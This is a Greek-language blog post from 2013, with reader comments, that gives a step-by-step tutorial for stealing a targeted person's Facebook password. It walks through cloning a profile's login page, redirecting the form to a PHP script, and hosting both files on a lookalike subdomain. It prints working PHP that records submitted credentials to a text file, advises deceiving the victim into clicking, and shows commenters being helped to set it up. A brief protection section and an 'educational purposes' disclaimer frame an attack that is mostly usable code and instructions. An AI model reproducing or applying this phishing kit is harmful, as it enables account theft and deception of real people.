ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Σάββατο, 14 Σεπτεμβρίου 2013

Πως κλεβετε κωδικο απο στοχευμενο χρηστη του Facebook (Advance Phishing)




Τι θα χρειαστείτε;

1.Windows η οποιαδήποτε άλλο λειτουργικό




Πατάμε εδώ και δημιουργούμε ένα λογαριασμό δείτε εικόνα κάτω
 


-βάζουμε τα στοιχεία μας 
-θα μας ζητήσει να κάνουμε επιβεβαίωση κτλ όταν κάνουμε και έχουμε επιτυχώς φτιάξει τον λογαριασμό τότε επιλέγουμε στην καρτέλα δωρεάν παραγγελία δείτε εικόνα κάτω


-θα μας εμφανίσει τις κάτω επιλογές


-στο subdomain θα γράψετε κάτι παραπλήσιο του facebook η το όνομα του θύματος
-μετά ανοίγουμε μια καρτέλα και του facebook και πάμε στο προφίλ του θύματος.
*για εκπαιδευτικούς σκοπούς θα χρησιμοποιήσω το προφίλ της γνωστής χορεύτριας Katerina Dancer που συμφώνησε να χρησιμοποιήσω την φωτογραφία της και το όνομα σε αυτόν τον οδηγό
-οπότε πηγαίνουμε στο προφίλ της και αντιγράφουμε την url
που είναι https://www.facebook.com/katerina.dancer.5
-αποσυνδεόμαστε από το facebook και κάνουμε επικόλληση της url στον περιηγητή μας δείτε εικόνα κάτω
 -πατάμε τα πλήκτρα ctrl+u και μας ανοίγει τον κώδικα της σελίδας δείτε εικόνα κάτω

-τώρα επιλέγουμε όλο το περιεχόμενο με τα πλήκτρα ctrl+a και ctrl+c το αντιγράφουμε
-ανοίγουνε ένα έγγραφο κειμένου (notepad) και με cltr+v κάνουμε επικόλληση
-πατάμε ctrl+f για να φέρουμε την αναζήτηση και γράφουμε μέσα στο κουτάκι Katerina Dancer δείτε εικόνα κάτω
 -καθώς μας έχει βρει το όνομα απλά εμείς το αλλάζουμε σε ότι θέλουμε πχ εγώ θα το αλλάξω σε Κοπέλα Λάστιχο απλά για ευκολία σας κάνετε αντιγραφή το "Κοπέλα Λάστιχο" δλδ το ονομα που θελετε να δωσετε και με ctrl+f φέρνετε την αναζήτηση και μετά ctrl+v για να το αντικαταστησετε με επικολληση μετά πάλι μέχρι να αλλάξετε το όνομα σε όλο τον κώδικα 4-5 φορες νομιζω θα χρειαστει να αλλάξετε
-μετά παλι με ctrl+f κανουμε αναζήτηση action="https://www.facebook.com/login.php?login_attempt=1" και το αλλάζουμε σε action="post.php"
-τελος αποθηκευουμε το αρχειο σε index.html
-ανοίγουμε ενα έγγραφο κειμένου και αντιγράφουμε αυτόν τον κώδικα

 <?php
header ('Location:http://www.facebook.com');
$handle = fopen("kodikoi.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

-τον κάνουμε επικόλληση στο αρχειο κειμένου και το αποθηκευουμε ως post.php
-τελος πηγαίνουμε στο hostinger.gr και επιλέγουμε αλλαγη δείτε εικόνα κάτω


 -μετά πηγαίνουμε λιγο κατω και επιλέγουμε Διαχειριστης Αρχειων 2 δειτε εικονα κατω


-και τωρα ανεβαζουμε τα 2 αρχεια δλδ το index.html και post.php δειτε εικονα κατω


 -επιλεγουμε log off και ειμαστε ετοιμοι
-τωρα απλα στελνουμε στο θυμα μας την σελιδα που δημιουργησαμε δλδ στην δικια μας περιπτωση http://foc3book.zz.mu

-οταν ανοιξει το θυμα το συνδεσμο που του στειλαμε τοτε θα του εμφανιστει η παρακατω σελιδα



-Τωρα για να κανουμε το θυμα να πατησει στο link χρειζονται 2 πραγματα εμπιστοσυνη και δολο

-Ο δολος στο παραδειγμα μας ειναι να πουμε στο θυμα οτι καποιος εφτιαξε ψευτικο προφιλ με αυτη ,οτι εκλεψε φωτογραφιες η οτι εσεις πιστευετε οτι το θυμα θα τσιμπισει.

-τελος για να δουμε αν τσιμπισε το θυμα βαζουμε στην url της σελιδα /kodikoi.txt πχ http://foc3book.zz.mu//kodikoi.txt δειτε εικονα κατω


Πως θα προστατευτειτε;

Απλα παντα οταν σας στελνουνε κατι παντα να κοιτατε το url και να ρωτατε τι ειναι πχ στο παραδειγμα το url ειναι http://foc3book.zz.mu οποτε καμια σχεση με το https://www.facebook.com
Bαλτε σαν ασφαλεια το κινητο και να σας ερχετε κωδικος για καθε φορα που συνδεεστε απο αγνωστη συσκευη στο facebook
Αν δε ειστε σιγουροι για κατι απλα βαλτε λανθασμενα στοιχεια αν δειτε οτι συνδεεστε τοτε ειναι σελιδα Phishing

9 σχόλια:

Monika Gryniewicz είπε...

Το εκανα με notepad++ και ειναι ενταξει.Ισως εκει να εκανα λαθος.Σε ευχαριστω...

Vladimiros Kilinkaridis είπε...

φιλε μια ερωτηση.αυτο που λες να κανουμε copy εκεινο το σκριπτ και να το αποθηκευσουμε στο σημιωματαριο,πως το κανουμε?αφου οταν παω να το κανω copy με βγαζει κατι για copyright

nickthesail0r είπε...

επιλεγεις το sctript ctrl+c αντιγραφη και μετα ctrl+v επικολληση απλα δεν σε αφηνει με το mouse να πατησεις δεξι κλικ γιατι το εβαλα εγω για να περιορισω την κλοπη των αναρτησεων μου

R@miAnNa είπε...

οταν παταω διαχειριστης αρχειων 2 μου βγαζει μηνυμα οτι δεν εχω προσβαση γιατι;

nickthesail0r είπε...

δεν εχεις βαλει τον κωδικο.οταν δημιουργησες το url εβαλες καποιο κωδικο εκει αυτο πρεπει να ξαναβαλεις

R@miAnNa είπε...

μου λεει κωδικος λογαριασμου FTP και βαζω τον κωδικο που εκανα log in και μου λεει οτι ο κωδικος ειναι λαθος...

nickthesail0r είπε...

μα στο οδηγο δεν λεω να πας σε FTP
διαβασε καλυτερα τις οδηγιες :)

marianna oikonomou είπε...

καλησπερα.πως μπορω να επικοινωνησω μαζι σου για καποιες ερωτησεις? δεν μπορω να καταλαβω πως ανεβαζεις τα αρχεια

nickthesail0r είπε...

μπορεις να επικοινωνησεις μεσω της σελιδα που εφτιαξα στο facebook στειλε inbox

https://www.facebook.com/Nickthesail0r.gr